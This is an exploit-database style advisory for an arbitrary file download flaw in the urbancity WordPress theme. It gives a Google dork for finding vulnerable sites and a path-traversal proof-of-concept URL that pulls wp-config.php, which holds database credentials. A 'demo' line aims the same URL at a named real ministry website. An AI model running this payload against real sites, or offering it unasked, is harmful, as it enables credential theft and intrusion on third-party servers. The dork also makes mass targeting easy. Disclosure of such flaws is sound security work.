facebook facebook twitter rss

Wordpress urbancity Theme Arbitrary File Download Vulnerability

Author: Felipe M , Published: 26-09-2014
# Exploit Title: Wordpress urbancity Theme Arbitrary File Download Vulnerability

# Google Dork: inurl:wp-content/themes/urbancity/

# Date: 25-09-2014

# Author: Felipe M.

# Author E-mail : secure@gudwal.com

# Category: webapps

# platform: php

# Vendor: https://churchthemes.net/themes/urban-city/

# p0c :

http://[site]/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php

# demo :

http://www.nlbcministries.org/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php

Like us on Facebook :